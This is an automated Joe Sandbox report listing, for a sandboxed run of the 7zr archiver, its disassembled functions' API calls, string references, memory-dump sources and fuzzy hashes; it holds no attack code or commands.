                                  • Part of subcall function 00A69C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00A69CC8
                                • __aulldiv.LIBCMT ref: 00AA093F
                                • __aulldiv.LIBCMT ref: 00AA094B
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                • String ID: 3333
                                • API String ID: 3520896023-2924271548
                                • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                • Instruction ID: bf50a46f88a032f347df41ab7e00b09350594d8a0de4bd95cd8140e217e1a12d
                                • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                • Instruction Fuzzy Hash: 3A2186B19007086EE7309FAA8981A6BFBFDEF85750F00892EB186D3741D670A9448B65
                                APIs
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                • memset.MSVCRT ref: 00A8AEBA
                                • memset.MSVCRT ref: 00A8AECD
                                  • Part of subcall function 00AA04D2: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00AA04F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: memset$ExceptionThrowfree
                                • String ID: Split
                                • API String ID: 1404239998-1882502421
                                • Opcode ID: 9945a7de77b5810f93433c37db2fe906020434e7ada0e562ef8328826eb78b10
                                • Instruction ID: e230c0d04d6f95f06933e74ed5fa355abcb57a448b1a1b5c3c700be9d4348637
                                • Opcode Fuzzy Hash: 9945a7de77b5810f93433c37db2fe906020434e7ada0e562ef8328826eb78b10
                                • Instruction Fuzzy Hash: D1424C70E04248DFEF25EFA4C984BADBBB1BF25304F14409AE449A7251CB75AE85CF21
                                APIs
                                • fputs.MSVCRT ref: 00A98437
                                • fputs.MSVCRT ref: 00A98401
                                  • Part of subcall function 00A61FB3: __EH_prolog.LIBCMT ref: 00A61FB8
                                • __EH_prolog.LIBCMT ref: 00A983C4
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prologfputs$fputc
                                • String ID:
                                • API String ID: 678540050-0
                                • Opcode ID: 00ea98f107a5afa556121498da0128c9087d5a1b4acb43e32e9c3b9c3ae4c29d
                                • Instruction ID: 07d1dbe38a936f2cf3a18d4311fd6cca36adee967389a375333a061d47f05520
                                • Opcode Fuzzy Hash: 00ea98f107a5afa556121498da0128c9087d5a1b4acb43e32e9c3b9c3ae4c29d
                                • Instruction Fuzzy Hash: 9D115E31F045159BCF09BBA0DA13AAEBFB6EF84750F10002AF502A32E1DF6959458BE5
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A82CE0
                                  • Part of subcall function 00A65E10: __EH_prolog.LIBCMT ref: 00A65E15
                                  • Part of subcall function 00A741EC: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00A7421A
                                  • Part of subcall function 00A6965D: VariantClear.OLEAUT32(?), ref: 00A6967F
                                Strings
                                • Cannot create output directory, xrefs: 00A83070
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ClearExceptionThrowVariant
                                • String ID: Cannot create output directory
                                • API String ID: 814188403-1181934277
                                • Opcode ID: 3a6e8962ab8cea449ca76b893c7729adccf7ec644fa6bab05154913f4a5abaf5
                                • Instruction ID: 811c9eb4635f223b6d286440c934b5617f95b953c4cff2f915a3e9db5f86cd3a
                                • Opcode Fuzzy Hash: 3a6e8962ab8cea449ca76b893c7729adccf7ec644fa6bab05154913f4a5abaf5
                                • Instruction Fuzzy Hash: 91F1BE31900289EFCF25EFA4CA90AEDBFB5BF19300F1480A9E545A7252DB31AE55CB51
                                APIs
                                • fputs.MSVCRT ref: 00A9C840
                                  • Part of subcall function 00A625CB: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00A625ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: ExceptionThrowfputs
                                • String ID:
                                • API String ID: 1334390793-399585960
                                • Opcode ID: cf9034dec0fa0609ef4d1296afb3eefe0916590261186ba76a85e99d79844285
                                • Instruction ID: cfa471c5af6b7456ba3f7a26ad2586fdfe1ff169414ee7a81e41038a6a78335d
                                • Opcode Fuzzy Hash: cf9034dec0fa0609ef4d1296afb3eefe0916590261186ba76a85e99d79844285
                                • Instruction Fuzzy Hash: 9311C4716047449FDB25CF59C8C1BAAFBE6EF49314F04846EE1468B251D7B5BD04C760
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: Open
                                • API String ID: 1795875747-71445658
                                • Opcode ID: 4d289e2eeff7bef6d9582bb5c986004a077cf7972f860ebdeb0b8aeda34d0661
                                • Instruction ID: 6535a3e6661645f1127634de3db94b2d15e3c17f5186d28fe87bcf4b059c086f
                                • Opcode Fuzzy Hash: 4d289e2eeff7bef6d9582bb5c986004a077cf7972f860ebdeb0b8aeda34d0661
                                • Instruction Fuzzy Hash: 80117032605B049FDB21EF34DA91ADABBE5EF64310F54852EE19A83252DB71A904CF50
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AB06B3
                                • _CxxThrowException.MSVCRT(?,00B1D480), ref: 00AB08F2
                                  • Part of subcall function 00A61E0C: malloc.MSVCRT ref: 00A61E1F
                                  • Part of subcall function 00A61E0C: _CxxThrowException.MSVCRT(?,00B14B28), ref: 00A61E39
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: ExceptionThrow$H_prologmalloc
                                • String ID:
                                • API String ID: 3044594480-0
                                • Opcode ID: c348c79ed0fc85260e74cde58ed74a0b4af83346a59b3fad8515ec603b4259fa
                                • Instruction ID: 10baefd579c794aad37d675c08d3f2e81b9bb4891b3a9b637fbdd8e185eabc4c
                                • Opcode Fuzzy Hash: c348c79ed0fc85260e74cde58ed74a0b4af83346a59b3fad8515ec603b4259fa
                                • Instruction Fuzzy Hash: 04913B71900249DFCF21DFA8C981EEEBBB9BF19304F148199E445A7292CB31AE45CF61
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 238d9bf34a2169a8632607f01cd14ff37960db4048e5a86e00c86ea42d44ba5a
                                • Instruction ID: 5e04081b264e3d302c00024cb99d59e47121c2fc3c691050e089c20bba9a3693
                                • Opcode Fuzzy Hash: 238d9bf34a2169a8632607f01cd14ff37960db4048e5a86e00c86ea42d44ba5a
                                • Instruction Fuzzy Hash: F2F1A971A04B858FCF25CF64C990BAABBF1BF19304F58C86EE49E9B211D730A944DB11
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A74255
                                  • Part of subcall function 00A7440B: __EH_prolog.LIBCMT ref: 00A74410
                                  • Part of subcall function 00A61E0C: malloc.MSVCRT ref: 00A61E1F
                                  • Part of subcall function 00A61E0C: _CxxThrowException.MSVCRT(?,00B14B28), ref: 00A61E39
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 3744649731-0
                                • Opcode ID: 0ec99e44916dc1131ba28c3c88faaf69336748ab9a4774aff2108c25c76cabf2
                                • Instruction ID: 8aa6992e9161163141803bc605cdb296c1e95c3dcc7377c3b2f831791ba51bc3
                                • Opcode Fuzzy Hash: 0ec99e44916dc1131ba28c3c88faaf69336748ab9a4774aff2108c25c76cabf2
                                • Instruction Fuzzy Hash: EF51C6B1401B44CFC725DFA9C28469AFFF0BF19304F5588AEC49E97692D7B1A608CB61
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 31cd7a81d169398494e7097d00f9ef4126c435f14801f581d6b3411d24c49e7f
                                • Instruction ID: aeb651d8ff428aed1faff5e2b321f41bb1202f0dabb33632095c5d837a9bd1eb
                                • Opcode Fuzzy Hash: 31cd7a81d169398494e7097d00f9ef4126c435f14801f581d6b3411d24c49e7f
                                • Instruction Fuzzy Hash: 5F313CB0D00209DFCB54EF95C9A1CEEBBB9FF84364B20852DE42A67241D7709D05CBA0
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A8021F
                                  • Part of subcall function 00A73D66: __EH_prolog.LIBCMT ref: 00A73D6B
                                  • Part of subcall function 00A73D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73D7D
                                  • Part of subcall function 00A73D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73D94
                                  • Part of subcall function 00A73D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00A73DB6
                                  • Part of subcall function 00A73D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73DCB
                                  • Part of subcall function 00A73D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73DD5
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID:
                                • API String ID: 1532160333-0
                                • Opcode ID: 64726aee970b6f164778a1589817f3a2ec610cb83c51e5b7cfe3219d770cfd0e
                                • Instruction ID: 6f53516a200e22e67a8d56f40838b14fbfd18e32a4896f4c1291cd84da2dad60
                                • Opcode Fuzzy Hash: 64726aee970b6f164778a1589817f3a2ec610cb83c51e5b7cfe3219d770cfd0e
                                • Instruction Fuzzy Hash: F62139B1846B90CFC731CF6A86D0686FFF4BB19600B94996ED1DA83B12C370A508CF55
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A9C0B8
                                  • Part of subcall function 00A87193: __EH_prolog.LIBCMT ref: 00A87198
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$free
                                • String ID:
                                • API String ID: 2654054672-0
                                • Opcode ID: 873314bde5f7af7dfd7f01b5e93c0ce88488fb3fb97a69809e1d0be44e868311
                                • Instruction ID: 382a1a80fb6dc6006d30b87e9a6aaab30129c374276626e1300008bc7afa2a57
                                • Opcode Fuzzy Hash: 873314bde5f7af7dfd7f01b5e93c0ce88488fb3fb97a69809e1d0be44e868311
                                • Instruction Fuzzy Hash: 2CF0B472B00711DFDB259B59E9417AEF7E9EF54760F10016FE501A7652CFB1DC108690
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AA0364
                                  • Part of subcall function 00AA01C4: __EH_prolog.LIBCMT ref: 00AA01C9
                                  • Part of subcall function 00AA0143: __EH_prolog.LIBCMT ref: 00AA0148
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                  • Part of subcall function 00AA03D8: __EH_prolog.LIBCMT ref: 00AA03DD
                                  • Part of subcall function 00AA004A: __EH_prolog.LIBCMT ref: 00AA004F
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$free
                                • String ID:
                                • API String ID: 2654054672-0
                                • Opcode ID: 80ab88a1955633c4100a199be6466c97862e57d59bac51ccbfe29f8ad293c96f
                                • Instruction ID: 5d59f6cd939004f69bedd9bcbbe6d405a9720572175124add19e1b84f33db9a8
                                • Opcode Fuzzy Hash: 80ab88a1955633c4100a199be6466c97862e57d59bac51ccbfe29f8ad293c96f
                                • Instruction Fuzzy Hash: 10F0F471A14A54DFCB1AEB68CA227EDBBE4AF01314F10469DE052632D2CBB5AB048754
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: f02721ecca84f3470a17966b0f863cc7f5201883dddaa50b3cecf7340faff95f
                                • Instruction ID: c2263406b867e41dbd011364b9d3479215d66b721ba362afea083d439a29400d
                                • Opcode Fuzzy Hash: f02721ecca84f3470a17966b0f863cc7f5201883dddaa50b3cecf7340faff95f
                                • Instruction Fuzzy Hash: EEF0AF32E0011AABCF00DF98C8408AFBBB8FF84750B00805AF416E7250CB388A05CB90
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID:
                                • API String ID: 1795875747-0
                                • Opcode ID: e910287666dacacf53a67d0d234b8e05d7919c12a2fef786bc5efaeb18e9284a
                                • Instruction ID: 8f869f36d91086e6260d92aab59f11ffb54a473b6a617de595aab3fede6d890f
                                • Opcode Fuzzy Hash: e910287666dacacf53a67d0d234b8e05d7919c12a2fef786bc5efaeb18e9284a
                                • Instruction Fuzzy Hash: 00D01732504129ABCF156B98EC06CDDBBBCEF18254B04442AF941F21A0EBB5EA148BA4
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AB80AF
                                  • Part of subcall function 00A61E0C: malloc.MSVCRT ref: 00A61E1F
                                  • Part of subcall function 00A61E0C: _CxxThrowException.MSVCRT(?,00B14B28), ref: 00A61E39
                                  • Part of subcall function 00AABDB5: __EH_prolog.LIBCMT ref: 00AABDBA
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 3744649731-0
                                • Opcode ID: 97dca68f54ba734401837a106773d4d703c6137fbb7f4afbe6abbd0c13c00610
                                • Instruction ID: ba2d4a7561189a1b9b2b5c90c0973280b036a2b625f28249e045c71c227f0587
                                • Opcode Fuzzy Hash: 97dca68f54ba734401837a106773d4d703c6137fbb7f4afbe6abbd0c13c00610
                                • Instruction Fuzzy Hash: E5D01771B01105AEDB48ABB8952266E76A4AB44340F0049ADA426E3782EF7489008620
                                APIs
                                • FindClose.KERNELBASE(00000000,?,00A66880), ref: 00A66853
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 860a985849536b9c15b4c9ebd6ebb9cc5bb5f7a91612e74dfc02e84936359bcd
                                • Instruction ID: aee7415dc9e8011a771d51ec284aa8e097ded31564868b7fc139661424c04b8c
                                • Opcode Fuzzy Hash: 860a985849536b9c15b4c9ebd6ebb9cc5bb5f7a91612e74dfc02e84936359bcd
                                • Instruction Fuzzy Hash: 70D0123110422246CA646F3EB8489C637E86E5A3343210B9AF0B0D31E2EB608C839A90
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID:
                                • API String ID: 1795875747-0
                                • Opcode ID: 02661445c34b43ed3b9afb11edca592912190fb4ef163aa5b0a77081112ee8d3
                                • Instruction ID: 94db1bc87a8a54b5bd7ad365b2372a255f32adec488460a7ec6da2dce35ac96d
                                • Opcode Fuzzy Hash: 02661445c34b43ed3b9afb11edca592912190fb4ef163aa5b0a77081112ee8d3
                                • Instruction Fuzzy Hash: 1CD0C936008251AFD6256F05EC09C8BBFB5FFE9320721082FF480921609B626D25DAA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: memmove
                                • String ID:
                                • API String ID: 2162964266-0
                                • Opcode ID: fb015c103b6a7a08755657176b850e4f1c9c632384d36763587f1dcc38bfb36c
                                • Instruction ID: 1597bb4143af2c496a3f734da9d09c38d84dadd90ae487fbf066ed181a9920bd
                                • Opcode Fuzzy Hash: fb015c103b6a7a08755657176b850e4f1c9c632384d36763587f1dcc38bfb36c
                                • Instruction Fuzzy Hash: 77816F75E00249AFCF14CFA8C584AFDBBB1EF48324F14946AD592B7241D775AA80CF54
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                • Instruction ID: 0473174565964a297cf6e23d72382723687cb80d8ccb9085d77790b91345dc13
                                • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                • Instruction Fuzzy Hash: 31D012B165364506DF484F724D4AB6B31942F6035AF288DBCF813CB2D1FB29C6199258
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000), ref: 00AE6B31
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
